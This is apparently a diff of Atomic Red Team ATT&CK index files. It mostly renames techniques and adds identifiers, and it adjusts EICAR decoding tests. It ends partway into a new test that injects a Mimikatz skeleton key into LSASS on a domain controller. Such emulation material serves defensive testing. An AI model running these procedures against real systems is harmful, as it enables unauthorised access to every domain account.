         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -34601,6 +34605,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -35002,6 +35007,7 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1205:
     technique:
@@ -44936,7 +44942,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -44966,6 +44972,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -56879,6 +56886,7 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1078.001:
     technique:

atomics/Indexes/esxi-index.yaml

@@ -11470,7 +11470,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -22945,7 +22946,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -22968,6 +22969,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -27152,7 +27154,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -27173,6 +27175,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -32017,7 +32020,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -32047,6 +32050,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -33817,7 +33821,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -33844,6 +33848,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -34245,6 +34250,7 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1205:
     technique:
@@ -44146,7 +44152,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -44176,6 +44182,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -55889,6 +55896,7 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1078.001:
     technique:

atomics/Indexes/google-workspace-index.yaml

@@ -11470,7 +11470,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -23061,7 +23062,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23084,6 +23085,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -27268,7 +27270,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -27289,6 +27291,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -32133,7 +32136,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -32163,6 +32166,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -33991,7 +33995,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -34018,6 +34022,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -34419,6 +34424,7 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1205:
     technique:
@@ -44320,7 +44326,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -44350,6 +44356,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -56063,6 +56070,7 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1078.001:
     technique:

atomics/Indexes/iaas-index.yaml

@@ -11470,7 +11470,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -22945,7 +22946,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -22968,6 +22969,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -27152,7 +27154,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -27173,6 +27175,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -32017,7 +32020,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -32047,6 +32050,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -33817,7 +33821,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -33844,6 +33848,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -34245,6 +34250,7 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1205:
     technique:
@@ -44146,7 +44152,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -44176,6 +44182,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -55889,6 +55896,7 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1078.001:
     technique:

atomics/Indexes/iaas_aws-index.yaml

@@ -11895,7 +11895,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -11925,6 +11925,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -23492,7 +23493,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23515,6 +23516,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -27836,7 +27838,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -27857,6 +27859,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -32803,7 +32806,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -32833,6 +32836,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -34603,7 +34607,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -34630,6 +34634,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -35031,6 +35036,7 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1205:
     technique:
@@ -45064,7 +45070,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -45094,6 +45100,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -57022,6 +57029,7 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1078.001:
     technique:

atomics/Indexes/iaas_azure-index.yaml

@@ -11550,7 +11550,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -11580,6 +11580,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -23408,7 +23409,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23431,6 +23432,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -27615,7 +27617,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -27636,6 +27638,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -32637,7 +32640,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -32667,6 +32670,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -34522,7 +34526,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -34549,6 +34553,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -34950,6 +34955,7 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1205:
     technique:
@@ -45231,7 +45237,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -45261,6 +45267,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -57273,6 +57280,7 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1078.001:
     technique:

atomics/Indexes/iaas_gcp-index.yaml

@@ -11511,7 +11511,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -11541,6 +11541,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -23349,7 +23350,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23372,6 +23373,7 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
+      identifier: T1569.003
     atomic_tests: []
   T1059.009:
     technique:
@@ -27556,7 +27558,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -27577,6 +27579,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -32495,7 +32498,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -32525,6 +32528,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -34412,7 +34416,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -34439,6 +34443,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -34840,6 +34845,7 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1205:
     technique:
@@ -44741,7 +44747,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -44771,6 +44777,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -56553,6 +56560,7 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
+      identifier: T1659
     atomic_tests: []
   T1078.001:
     technique:

atomics/Indexes/index.yaml

@@ -2049,8 +2049,9 @@ defense-evasion:
           $bytes = [System.Convert]::FromBase64String($encodedString)
           $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
           #write the decoded eicar string to file
-          $decodedString | Out-File T1027.013_decodedEicar.txt
-        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
+          $decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
+        cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
+          Ignore
         name: powershell
         elevation_required: false
     - name: Decrypt Eicar File and Write to File
@@ -2068,8 +2069,9 @@ defense-evasion:
           $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
           $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
           #Write the decrypted eicar string to a file
-          $decryptedString | out-file T1027.013_decryptedEicar.txt
-        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
+          $decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
+        cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
+          -ErrorAction Ignore
         name: powershell
         elevation_required: false
     - name: Password-Protected ZIP Payload Extraction and Execution
@@ -27963,7 +27965,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -27993,7 +27995,54 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
